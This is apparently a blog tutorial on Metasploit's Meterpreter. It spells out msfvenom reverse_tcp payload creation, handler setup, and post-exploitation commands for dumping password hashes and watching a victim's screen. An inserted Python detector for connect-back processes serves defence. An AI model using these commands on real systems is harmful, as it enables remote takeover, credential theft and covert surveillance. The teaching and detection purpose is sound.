METERPRETER EXPLAINED
WELCOME TO TAMILCODE
ON THIS WEBSITE WE ARE GOING TO DISCUSS: WHAT IS METERPRETER? HOW DO YOU USE IT? HOW DOES IT WORK?
WHAT IS METERPRETER?
Meterpreter is an extensible, dynamic payload that is used to interact with a target over the connection between two machines.
FOR EXAMPLE:
Suppose the attacker is on Linux and the victim is on Windows, and you want to make a connection between the two systems. What would you do? (This scenario is for user privilege only.) There are a lot of options, but the better solution is Meterpreter, which provides the connection between the two systems.
HOW DOES IT WORK?
1. The target executes the initial stage, which is of the reverse or bind type.
2. The stage loads the DLL by DLL injection.
3. The Meterpreter core is initialized, and Metasploit receives its GET request and configures the client.
4. You can then run Meterpreter commands from your machine.
METERPRETER DESIGN GOALS:
It is a stealthy tool: it is loaded into memory and writes nothing to disk, and it is injected by DLL injection.
It is a powerful tool: it uses a channelized communication system and TLV protocol encryption.
It is an extensible tool: it can load over the network, etc.
Next, we are going to create a payload using msfvenom and get a Meterpreter session.
Then we are going to review some Meterpreter commands.
In this scenario we use two machines: the attacker, which is Linux, and the victim, which is Windows.
STEP 1 : Create the payload using msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.0.0.0.1 LPORT=8080 -f exe > stages.exe
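NOTE:
Use your own IP address for LHOST (the local host, that is, the machine the payload connects back to) and any free port for LPORT. The address 192.0.0.0.1 shown above is only a placeholder and is not a valid IP address.
Next, set up the listener on the attacker machine, which is Linux.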
STEP 2: msfconsole
Type msfconsole to open Metasploit.
STEP 3: use exploit/multi/handler
STEP 4: set payload windows/meterpreter/reverse_tcp
STEP 5: set LHOST 192.0.0.0.1
STEP 6: set LPORT 8080
WARNING:
Set LHOST to your own IP address and LPORT to the port you used when creating the payload.
STEP 7: run
Next, execute the payload on Windows, which is the victim machine in this case.
booooooooooom!!!!!!!
Now we get the Meterpreter session on the attacker machine (Linux).
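The connect-back in this walkthrough (an .exe run on the Windows machine that immediately opens a TCP connection to LHOST:LPORT) is something a defender can hunt for. The following is an added example, not part of the original post: it correlates process-creation and network-connection events and flags programs started from user-writable paths that connect out within seconds of launch. The event fields are a simplified, assumed schema modelled on Sysmon Event ID 1 and 3, and the sample events, path list and time window are constructed for illustration.

```python
from datetime import datetime, timedelta

# Assumed heuristics (not from the page): directories a standard user can write to,
# and how soon after launch a connect-back is expected.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")
WINDOW = timedelta(seconds=30)

# Constructed sample events. id 1 = process creation, id 3 = network connection.
SAMPLE_EVENTS = [
    {"id": 1, "time": "2024-05-01T10:00:00", "guid": "{A1}", "image": r"C:\Users\bob\Downloads\stages.exe"},
    {"id": 3, "time": "2024-05-01T10:00:02", "guid": "{A1}", "initiated": True, "dst": "10.0.0.5", "port": 8080},
    {"id": 1, "time": "2024-05-01T10:01:00", "guid": "{B2}", "image": r"C:\Program Files\Browser\browser.exe"},
    {"id": 3, "time": "2024-05-01T10:01:01", "guid": "{B2}", "initiated": True, "dst": "10.0.0.9", "port": 443},
    {"id": 1, "time": "2024-05-01T10:02:00", "guid": "{C3}", "image": r"C:\Users\bob\AppData\Local\app\sync.exe"},
    {"id": 3, "time": "2024-05-01T10:20:00", "guid": "{C3}", "initiated": True, "dst": "10.0.0.9", "port": 443},
    {"id": 3, "time": "2024-05-01T10:03:00", "guid": "{D4}", "initiated": True, "dst": "10.0.0.9", "port": 445},
]


def find_connect_backs(events, window=WINDOW):
    """Return alerts for user-writable-path processes that connect out soon after start."""
    started = {}  # process GUID -> (start time, image path)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 1:
            started[ev["guid"]] = (ts, ev["image"])
        elif ev["id"] == 3 and ev.get("initiated"):
            proc = started.get(ev["guid"])
            if proc is None:
                continue  # process start is outside this log slice; cannot judge
            start, image = proc
            in_user_path = any(p in image.lower() for p in USER_WRITABLE)
            if in_user_path and ts - start <= window:
                alerts.append({"image": image, "dst": ev["dst"], "port": ev["port"],
                               "delay_s": (ts - start).total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in find_connect_backs(SAMPLE_EVENTS):
        print(alert)
```

On the sample data only the stages.exe event is flagged; widening the window trades fewer misses for more noise from ordinary per-user applications.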
Next, we look at some basic Meterpreter commands.
If you want more detail, enter the command help in the Meterpreter session.
CAT:
COMMAND: cat
Used to cat a file on the machine (to read the file).
MKDIR:
COMMAND: mkdir
Used to make a directory on the victim machine.
PS:
COMMAND: ps
Used to see the processes on the victim, with their PIDs (process identifiers).
NETSTAT:
COMMAND: netstat
Used to see the network connections on the machine.
HASHDUMP:
COMMAND: run hashdump
Used to dump the hashes on the machine (maybe password hashes).
SCREENSHOT:
COMMAND: screenshot
Used to take a picture of the machine's screen.
SCREENSHARE:
COMMAND: screenshare
Used to watch the victim machine live.
In this case you get an HTML file, so load that HTML file in your browser.
IDLE TIME:
COMMAND: idletime
Used to identify activity on the machine.
For example, if I use the mouse or keyboard on the machine, you can see the time of the last activity (the time of the click).